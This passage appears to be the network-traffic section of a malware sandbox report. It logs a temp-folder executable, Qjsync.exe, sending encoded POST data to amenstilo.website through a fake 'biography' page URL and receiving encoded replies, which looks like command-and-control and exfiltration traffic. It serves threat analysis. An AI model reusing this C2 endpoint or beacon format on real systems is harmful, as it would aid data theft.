2024-12-02 06:25:21 UTC	212	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 89 89 91 2c 08 00 00 00 32 00 00 00 99 00 00 00 84 75 ea 08 34 7f 94 96 1f 1f 2f 54 0c 0c 0c 0c 0c 0c 0c 0c 02 0c 0c 0c 2b 8d 8d 29 8d 2f 0c 1f 1f 2f 54 0c 0c 0c 0c 0c 0c 0c 0c c8 0c 0c 0c ac 9a 00 00 54 0c 0c 0c 0c 0c 0c 0c 56 0c 56 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ac 9a 00 02 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0e 0c 0c 0c ac 9a 06 00 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: ,2u4/T+)//TTVV
2024-12-02 06:25:21 UTC	868	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:21 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ADSccKNA5PJ%2BL6Zgz1cKe07h2C1qjOEHHQ3gJXYJ9yEpJNVJvBWnCQJixyNU9Bp36SbKtMynGzqhF%2FqyqqnuUP8c0QKTvyECnRWr5MANmwY0Am0kX6%2F8uOZ47KxHlHKvGmWVPA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d3cad556a57-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1734&min_rtt=1733&rtt_var=652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1360&delivery_rate=1674311&cwnd=231&unsent_bytes=0&cid=0c537f1dfebe3719&ts=662&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49872	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:23 UTC	512	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 380 Host: amenstilo.website
2024-12-02 06:25:23 UTC	380	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 21 b1 e3 22 08 00 00 00 32 00 00 00 95 00 00 00 84 75 ea 08 34 7f 94 96 4e 6f cb 48 0c 0c 0c 0c 0c 0c 0c 0c 0a 0c 0c 0c 29 8d 2d 4e 6f cb 48 0c 0c 0c 0c 0c 0c 0c 0c c8 0c 0c 0c ac 9a 00 00 54 0c 0c 0c 0c 0c 0c 0c 56 0c 56 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ac 9a 00 02 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0e 0c 0c 0c ac 9a 06 00 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 06 dd 60 0d 08 00 00 00 32 00 00 00 94 00 00 00 84 75 ea 08 34 7f 94 96 00 b7 cc 16 0c 0c 0c 0c 0c 0c 0c 0c 08 0c 0c 0c 2f 2d 00 b7 cc 16 0c 0c 0c 0c 0c 0c 0c 0c c8 0c 0c 0c ac 9a 00 00 54 Data Ascii: !"2u4NoH)-NoHTVV`2u4/-T
2024-12-02 06:25:23 UTC	870	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:23 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8mWnFjfTzii1NKxwiLs2NW1BRAht5mC0Am5iU7AViBhRblVJTNNQClq5LtFrtwM71P%2Bl1z3susz7DlkOkGqCEdLMagYIvBQ6eo%2FfgRAr0A%2FYh%2F84DhNoRUqCM87x1w6AF2MEVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d492b590c8e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1572&rtt_var=592&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1528&delivery_rate=1843434&cwnd=181&unsent_bytes=0&cid=f4ea6c445d2343ea&ts=667&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49877	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:25 UTC	514	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 14833 Host: amenstilo.website
2024-12-02 06:25:25 UTC	14833	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 9d 9c 24 2d 08 00 00 00 32 00 00 00 b6 39 00 00 84 75 ea 08 34 7f 94 96 37 35 44 56 0c 0c 0c 0c 0c 0c 0c 0c 04 0c 0c 0c 2b 8d 0c 2d 37 35 44 56 0c 0c 0c 0c 0c 0c 0c 0c 09 7e 0c 0c ac 9a 0a 04 56 0c 0c 1c 1c 0c 38 b8 14 a2 5d 3d c4 5e f3 f3 f3 f3 f3 f3 f3 f3 38 0c 24 0c 82 e8 ce c8 c8 c6 e8 b4 c4 c6 ea b4 82 8e 92 88 8a a0 9e ae 9e 98 50 d8 ec c2 0e 0c 2c 0c 08 04 0c 0c 0c 0c 0c 0c 02 04 0c 0c 0c 0c 0c 0c 0e 08 04 f7 fb 82 8e 92 88 8a a0 9e ae 9e 98 86 8e a6 ac a2 84 ac a8 b8 8a 8a 88 90 92 94 9e 88 a0 a8 ac ac 94 b8 ac 90 84 bc 96 bc a2 8e 9c a4 a0 a0 a6 98 98 a8 a6 aa 80 9e a2 a8 96 96 aa a8 9a 92 ae 9c 8a be aa be a6 88 96 aa bc b8 94 a6 84 bc ac 90 9a 9e ac 98 9c 90 94 9e 9a be 9e 90 86 86 94 ac Data Ascii: $-29u475DV+-75DV~V8]=^8$P,
2024-12-02 06:25:25 UTC	871	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:25 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zP2GIRfzSI9XaN5BEnYj9ApVjtYcWwcjYjpLiLtVMzmDFnEd704sLvZgP%2BtNqgvNCoofdjEUbHSZikjA%2BfzD%2BosWfJUkMeFtbPZtHdt9HjhaPYsinsDnQF69zg4n3me26vhCNg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d54ad03c346-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1665&rtt_var=651&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=16005&delivery_rate=1753753&cwnd=181&unsent_bytes=0&cid=278b84900aaca348&ts=670&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49883	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:27 UTC	514	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 85753 Host: amenstilo.website
2024-12-02 06:25:27 UTC	15331	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 01 2d f7 07 1a 08 00 00 00 32 00 00 00 be 4e 01 00 84 75 ea 08 34 7f 94 96 56 e3 02 38 0c 0c 0c 0c 0c 0c 0c 0c 36 14 0c 0c 3b 8d 41 7c 62 7c 64 6e 6e 5d c6 d0 c2 de d0 c6 c6 e8 2b 18 0c 97 98 c6 2f 29 97 06 0c 97 04 0c 93 0c 0c 0c 0e f3 e5 0c 0c bf 40 9e d0 e4 c6 d4 5c a8 5e 4c 8a d2 e8 c6 5c a4 96 5e 68 4c 8a ac a6 4c 60 60 6c 6c 4c 8c 4c 68 50 64 6c 4c 82 9c f8 2f 73 96 de ca e8 d2 ea d2 c0 e4 4c 88 ce ea de ca 4c 84 de ea ec d4 ce fe 4c 8e c4 ce ec e4 c6 e8 8d 8b b5 0c 6b 4d 41 aa fe ea e4 c6 d6 5d a8 c6 c2 de ea e4 e8 fe 5d ea d6 ea ea 50 c6 fc c6 5f ca ea e8 ea ea 50 c6 fc c6 5b e2 de d0 de d0 de e4 50 c6 fc c6 5f ca ea e8 ea ea 50 c6 fc c6 55 e2 de d0 d4 d2 c2 d2 d0 50 c6 fc c6 55 ea c6 e8 e0 de Data Ascii: -2Nu4V86;A\|b\|dnn]+/)@\^L\^hLL``llLLhPdlL/sLLLkMA]]P_P[P_PUPU
2024-12-02 06:25:27 UTC	15331	OUT	Data Raw: 91 f6 55 93 4c 8e 06 91 7f e6 7e 8b 62 b9 56 2b 95 c9 a6 2a fe 7d 96 b9 c0 fe 98 43 03 81 44 6e 97 d7 db 28 bf b0 80 5c 8b da 8b ca 6a 67 cb a4 cd 75 b3 cb e4 9a 4b a7 2a 2e e2 9b 27 4a 93 b4 ff 9c 58 36 94 21 f6 6d 4c 6d 51 2d 1a 5c be ee da f8 03 71 c1 79 26 b6 c0 60 c5 62 77 99 ae 25 23 16 02 2b 42 5a d8 6d 72 90 b1 36 d9 5c b2 7a 4b 9a 06 30 75 7b 9d 73 2a 95 ab f4 46 32 aa e8 4f f5 28 4b 99 57 5f dc 47 d5 e9 ad 35 e9 2f 01 d6 4a 36 5e 9f 85 0f 85 6f 5a 86 a4 4c c0 e3 55 6f e9 3a 41 e1 a1 87 35 ee 99 77 4f 1a 87 3c e5 f7 88 9d 57 45 d7 7a c5 81 0f b2 73 38 24 f7 a4 db bc 61 ff 47 38 10 42 64 89 eb c1 98 99 61 63 80 f5 a7 89 eb c0 a5 6a 46 84 f5 3d 38 59 0a 1c 69 a7 d3 52 5b 5e 64 ea 3c 5b 03 c7 15 7d 51 33 ca ee 59 9b 2a 01 23 81 0b b0 c4 d7 39 50 d7 Data Ascii: UL~bV+}CDn(\jguK.'JX6!mLmQ-\qy&`bw%#+BZmr6\zK0u{sF2O(KW_G5/J6^oZLUo:A5wO<WEzs8$aG8BdacjF=8YiR[^d<[}Q3Y#9P
2024-12-02 06:25:27 UTC	15331	OUT	Data Raw: c0 dd fb 94 d9 46 e4 3d b1 31 7f 87 82 d3 45 35 3f ab ed 37 1f 89 cf d3 dd 12 6d 82 52 34 e9 b3 6a 72 d5 ed 7e 1e 7b b0 a9 1b f7 2f 95 a3 be f6 da 34 bb 43 63 37 e3 b9 11 ad d5 a9 2a be a4 c5 21 a8 12 4e b9 c6 80 e1 8f 2d e1 58 f6 01 59 a4 cd 67 5f b1 85 5a 42 e5 4f 38 c5 3f c3 8c 01 52 26 bd 64 66 29 c9 a7 8a eb 09 81 f5 f6 e0 3b 4d 24 d0 e1 a8 ee 2f 8a 65 f3 59 31 eb d7 da 88 53 69 92 49 c2 ea 54 ad 88 3a cf 28 18 97 38 20 81 e7 9f 3b 85 c7 17 74 fb ab 4d e5 7e 43 be ad 82 10 8f be f2 d5 15 97 ff 33 ab 2b ab 09 eb 20 af 2a b5 27 26 71 21 9a 27 b2 19 95 33 7c 76 d6 e4 e7 18 1d f5 de de f0 c6 e9 c1 03 69 71 23 de 55 f4 95 a7 dc 5a 76 68 c5 1b 1d 13 db ef bd 03 d4 1e af 7b 6a c7 22 6b 49 c6 35 a3 00 80 c2 f8 73 fe 0f f3 b4 03 5c f4 ad 44 33 31 b0 20 6b f2 Data Ascii: F=1E5?7mR4jr~{/4Cc7!N-XYg_ZBO8?R&df);M$/eY1SiIT:(8 ;tM~C3+ '&q!'3\|viq#UZvh{j"kI5s\D31 k
2024-12-02 06:25:27 UTC	15331	OUT	Data Raw: 64 01 30 17 3c 9a 22 7c 5c b9 00 f4 61 08 40 76 55 8d 98 12 bd 2b 44 ea fc 71 e0 d1 0f ef d5 51 b9 16 2b 41 f7 61 27 32 73 9f 41 10 ed 49 d1 73 2a 88 a7 b3 ae 88 df 3e 9b 17 02 76 ec d2 a1 35 24 6c db 04 4e 9f e6 f3 85 4d f5 b3 fa ec e2 f9 d1 aa 51 43 db a8 f0 ac 0f b3 96 86 9e a6 87 89 3d a1 05 b4 58 ec 85 30 c7 f5 03 76 99 7a c6 80 06 30 b3 14 40 c3 ba 30 e1 39 df 48 e1 d2 76 fc 59 79 f6 40 5e 30 9a ad 44 4b 88 e7 14 0f 9a 6b 24 57 d6 3b 47 c8 99 6a 5f 45 64 98 26 26 3c 4f 25 fe 92 a8 a4 52 a1 f1 65 7e 74 e0 aa c1 d9 4f 42 26 5d 68 a9 7c 50 a1 3b a6 4a 50 db 12 ca e0 d9 00 4e 66 13 43 68 1f ab 02 33 3d 02 c2 03 89 0c c6 54 08 f5 d1 21 a6 d2 58 08 89 24 cf 7c 38 7e 3b d9 99 9a fd c8 7b cf 2d 99 8f 9a 69 77 c7 1a 57 d9 25 cb 6b 48 73 7b c7 5b 25 72 05 45 Data Ascii: d0<"\|\a@vU+DqQ+Aa'2sAIs*>v5$lNMQC=X0vz0@09HvYy@^0DKk$W;Gj_Ed&&<O%Re~tOB&]h\|P;JPNfCh3=T!X$\|8~;{-iwW%kHs{[%rE
2024-12-02 06:25:27 UTC	15331	OUT	Data Raw: b0 c5 bc 7c e7 e6 6a f6 f1 d8 d9 60 6c b9 29 92 62 69 72 fc ff 05 c4 77 fe 70 32 68 69 bc 48 5f 77 5c 77 1a fa 4c 32 ff 00 ee eb 70 fc 1c a8 6a c0 fd 84 4c 3d 9c 08 3f e3 c0 58 09 2d 6d ea d4 cd d5 53 25 74 58 ed eb 69 88 e9 06 9b 72 e2 24 a3 7a e6 5b 7e 52 de 54 22 93 d9 71 28 b1 30 b4 52 f0 84 fd 44 75 fd 60 6b 56 41 1d 18 3d 4f 6e b7 56 7a 88 f5 6a 48 19 42 d8 ab 27 da 74 3a 92 61 fc 2d 11 b7 62 df f7 d9 df 20 37 aa 5f ec d1 f5 43 d7 81 8c 8f 65 da 27 4b de 85 29 bc 99 29 e1 62 91 d6 9b 76 4f 97 71 6d 91 3b 63 a3 d0 3d f6 d0 7e 4f ee 50 2f 56 2d f5 e8 41 f4 4e d3 46 14 c4 f1 d1 df 52 b9 e9 8d 09 ef 15 d8 cc a8 2a 1c 8d a6 c0 1e e5 d8 68 0b 3b dc 59 48 21 ea 4c 1d 1a da 16 7f 04 6f 49 92 00 f7 34 d7 e2 8b bb 23 dd 8c 59 da c1 24 a8 d6 d6 73 c2 87 bc b5 Data Ascii: \|j`l)birwp2hiH_w\wL2pjL=?X-mS%tXir$z[~RT"q(0RDu`kVA=OnVzjHB't:a-b 7_Ce'K))bvOqm;c=~OP/V-ANFR*h;YH!LoI4#Y$s
2024-12-02 06:25:27 UTC	9098	OUT	Data Raw: 67 7a 3d 52 d8 d9 bd e6 61 f3 e5 e3 03 00 57 73 df b8 87 e9 85 f2 c2 c9 db b3 00 60 c1 2e db a8 f3 a2 a3 41 8f 57 36 f3 da d4 c1 82 ca 4a 47 48 a1 56 4c a4 8d 07 18 ad b0 88 17 72 87 65 8e 4c 1d 23 c2 f1 eb 08 b5 83 34 17 bd ac b5 53 c1 73 43 bd c1 5d 2e 48 a9 b9 f7 33 33 33 ce b2 e0 33 18 84 34 35 d1 37 2b d1 f9 c2 82 45 4b 08 10 f2 3b 0d 2c 70 97 ca 66 f1 ab 05 cb ae 2a 04 45 67 93 f2 e7 91 ee 7b 21 ea 82 e9 17 22 a5 74 0b 15 f9 e2 58 70 dc a5 d5 cc 71 5d 6f ce a3 03 f1 82 23 83 21 0a 07 a2 15 67 4d c1 3f f3 3f c9 65 8b c7 00 18 db d2 2c b3 52 8c 54 1d 90 d4 06 5c e5 fa 58 70 4f 42 11 07 f4 a8 fa bb 48 e1 ca 56 ef 12 2f de c7 29 e2 1d a8 b7 d4 e4 f2 d6 7f 00 57 72 f4 d7 3d 39 36 95 22 c6 92 58 6c 92 5d 75 be a0 ff c5 e1 87 fc a0 1b ae 1f cb c8 d2 bc 53 Data Ascii: gz=RaWs`.AW6JGHVLreL#4SsC].H3333457+EK;,pf*Eg{!"tXpq]o#!gM??e,RT\XpOBHV/)Wr=96"Xl]uS
2024-12-02 06:25:28 UTC	872	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:28 GMT Connection: close id: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHcV5EBlJfBs0R%2BzGAWK6CRaCVNcNEkCVpQ8%2FVii2kMuVeA9GqLaVUQTUlKzBGphPRBdGxG7Nj9HWGDXaoYEiPyMuh7hR3dmilrPUaa8NNWwZJLRG3%2BHsIwXp0D9S9yhBHh37A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d613b58c481-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1682&rtt_var=647&sent=48&recv=95&lost=0&retrans=0&sent_bytes=2846&recv_bytes=87145&delivery_rate=1671436&cwnd=236&unsent_bytes=0&cid=1d7f4751662a93c4&ts=1105&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49889	104.21.74.149	443	5648	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:25:29 UTC	511	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 keephis: muBSN9rS0m9IJp1td7zVaQplRSv1+npjCmN1+3Lp5KRnx3l+GpkQBQzoL3U0WvsRkGE+NF+ehk3fqBN20gQOF6/nAUHcsQFmStSolt9u4BXbAdffJ/ulEuxaOR7PEJni Content-Length: 35 Host: amenstilo.website
2024-12-02 06:25:29 UTC	35	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-12-02 06:25:30 UTC	736	IN	HTTP/1.1 204 No Content Date: Mon, 02 Dec 2024 06:25:30 GMT Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zaytQ%2ByUCidabuyYFS%2BLmXI3tfcE2%2BAWALIxEFb3C6whKdy6qmdl9tg0aqcyH6B2cABDYVD6TEALMTHYcfpVAXiahzYUuxXoUcY5Cfe5ZN8kLAuMX4t3nHJznVYkwDapUL%2Fw6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93d71aaf35e6d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1561&rtt_var=601&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1182&delivery_rate=1798029&cwnd=252&unsent_bytes=0&cid=5ace312840ada3fd&ts=900&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49981	104.21.74.149	443	4184	C:\Users\user\AppData\Local\Temp\Qjsync.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-02 06:26:10 UTC	372	OUT	POST /courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2FsjqNL9WLjcuO1JIs5YlYwsq2r0v2XtuOfeIISqlAWv5gAlx740W1uYA%2FAE%2FbB%2BPI3Lm%2FUw%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Length: 96 Host: amenstilo.website
2024-12-02 06:26:10 UTC	96	OUT	Data Raw: fd ff ff ff 00 00 00 00 00 00 00 00 03 00 00 00 92 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 2d 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-12-02 06:26:10 UTC	886	IN	HTTP/1.1 200 OK Date: Mon, 02 Dec 2024 06:26:10 GMT Transfer-Encoding: chunked Connection: close id: ndhsGVsHUw1HUlfNj653nEj11k0TRwAzT9Geka18Lq8NF4ouucFRYtQZ3/BY7fwllO/5mAhCBCE9jI/pTR6yRJwmRhvDg4MyL3tediT+kaSQvRhn679ofiEMA+ZC CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsbTSdK55Z%2BP0bsQeCA5bYRLGus2Txe7gEpCSpPCIhWsaoKK%2FyKlh7jgnCXnxl4RWFObRC%2BVwZG4BsVxQi3x6mqfIVxv3LbS5SrerZrZ7482K2%2FkChpgzFdvk8QCrSE2qWAjIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8eb93e6ecd947d02-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1795&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=1104&delivery_rate=1571582&cwnd=230&unsent_bytes=0&cid=4d90667010ddee3a&ts=908&x=0"
2024-12-02 06:26:10 UTC	483	IN	Data Raw: 33 37 61 30 0d 0a 4d 89 f9 31 00 00 00 00 00 00 00 00 69 7a 00 00 bf 03 2d 0a 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 bf 03 04 12 c6 5f 00 39 e9 b8 92 25 0f 13 06 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd 25 0f 08 84 5b b8 78 4a f3 94 96 58 50 c4 ce e4 35 00 6b 0c 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 35 00 08 ae be 89 c6 7c 95 58 7b b6 10 55 31 47 35 fc 5d 44 0c b5 01 10 00 04 00 05 05 11 14 0a 19 d2 d2 e7 44 0c 04 04 19 d4 66 2e d7 c6 f1 6e 02 f8 0c 10 00 04 00 05 05 11 14 0a 19 d2 d2 d5 6e 02 04 dd 69 18 70 f7 42 ff e2 b7 06 42 00 14 00 08 00 05 05 11 14 0a 19 e9 e9 c0 b7 06 08 b1 33 be aa dc a6 4d 1f a9 9d 62 5d e7 06 e9 39 d5 0a fe 0b 14 00 2b 00 05 05 11 14 0a 19 b5 b5 c0 d5 0a 08 84 5b b8 78 4a f3 94 96 e2 ce d4 d4 c6 e4 ea b4 8e e4 d2 d6 de ca b4 ce Data Ascii: 37a0M1iz-_9%%[xJXP5k5\|X{U1G5]DDf.nnipBB3Mb]9+[xJ
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: e1 6c 3c e8 ce 8b ae 1c 0b cb 01 14 00 07 00 05 05 11 14 0a 19 b5 b5 da 1c 0b 08 84 5b b8 78 4a f3 94 96 8e d0 fe 84 c6 ea da 4a 07 92 0d 14 00 06 00 05 05 11 14 0a 19 b5 b5 bf 4a 07 08 84 5b b8 78 4a f3 94 96 58 50 d2 e0 ec d0 b1 0e d4 09 14 00 06 00 05 05 11 14 0a 19 b5 b5 c0 b1 0e 08 84 5b b8 78 4a f3 94 96 86 fc d2 c4 e6 ea cf 0b 14 0c 14 00 05 00 05 05 11 14 0a 19 b5 b5 e7 cf 0b 08 84 5b b8 78 4a f3 94 96 58 50 d4 c4 c8 35 0e 41 01 14 00 08 00 05 05 11 14 0a 19 e9 e9 d5 35 0e 08 48 78 0d 3f 9b dd 58 3c 50 c2 d1 c8 a0 7d fc 1a a2 06 53 00 14 00 0f 00 05 05 11 14 0a 19 b5 b5 bd a2 06 08 84 5b b8 78 4a f3 94 96 aa c6 ea ea de d2 d0 4c aa e4 d2 e8 ce c2 c6 67 02 9c 0f 10 00 04 00 05 05 11 14 0a 19 d2 d2 c0 67 02 04 9d fc 0a 52 b5 d3 ed c0 25 0d 83 0a 10 Data Ascii: l<[xJJJ[xJXP[xJ[xJXP5A5Hx?X<P}S[xJLggR%
2024-12-02 06:26:10 UTC	1369	IN	Data Raw: 50 c6 fc c6 53 0a 2b 0c 14 00 08 00 05 05 11 14 0a 19 e9 e9 da 53 0a 08 42 92 ba b9 04 b5 71 e5 5a 3c 66 4e 3f 15 d5 c3 98 06 70 04 14 00 08 00 05 05 11 14 0a 19 e9 e9 bd 98 06 08 e4 73 8e a6 f3 06 45 6e fc dd 52 51 c8 a6 e1 48 c7 09 2b 03 14 00 05 00 05 05 11 14 0a 19 b5 b5 bd c7 09 08 84 5b b8 78 4a f3 94 96 58 50 de d0 de fb 0a d5 09 14 00 08 00 05 05 11 14 0a 19 e9 e9 99 fb 0a 08 e3 b7 f2 e3 93 65 37 07 fb 19 2e 14 a8 c5 93 21 70 03 9a 00 14 00 06 00 05 05 11 14 0a 19 b5 b5 fd 70 03 08 84 5b b8 78 4a f3 94 96 a0 de c6 e2 c6 e8 2e 04 55 05 14 00 06 00 05 05 11 14 0a 19 b5 b5 bd 2e 04 08 84 5b b8 78 4a f3 94 96 58 50 d4 d2 ca da 0d 01 7f 0f 14 00 09 00 05 05 11 14 0a 19 b5 b5 71 